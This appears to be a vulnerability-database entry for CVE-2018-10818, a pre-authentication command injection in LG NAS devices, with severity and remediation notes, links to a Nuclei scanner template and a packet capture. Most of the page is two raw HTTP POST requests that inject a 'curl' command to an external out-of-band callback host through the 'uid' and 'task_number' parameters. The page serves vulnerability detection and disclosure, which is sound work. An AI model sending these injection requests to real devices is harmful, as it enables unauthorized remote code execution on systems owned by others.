| Title | LG NAS Devices - Remote Code Execution |
|---|---|
| Author | gy741 |
| Severity | Critical |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected device. |
| Remediation | Apply the latest firmware update provided by LG to mitigate this vulnerability. |
| CVE ID | CVE-2018-10818 |
| Tags | cve cve2018 lg-nas rce oast injection vuln |
LG NAS devices contain a pre-auth remote command injection via the “password” parameter.
POST /system/sharedir.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586
Connection: close
Content-Length: 86
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
&uid=10; curl http://d5jpo2hle0o4vr6pj9kgpmqt7g3mt77jn.oast.me -H 'User-Agent: XkTSGy'
POST /en/php/usb_sync.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux aarch64; rv:90.0) Gecko/20100101 Firefox/90.0
Connection: close
Content-Length: 101
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
&act=sync&task_number=1;curl http://d5jpo2hle0o4vr6pj9kgp4pjmnuhew34n.oast.me -H 'User-Agent: XkTSGy'
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-10818.yaml
🦈 Packet Capture: ⬇️ Download cve-2018-10818.pcap
N/AN/A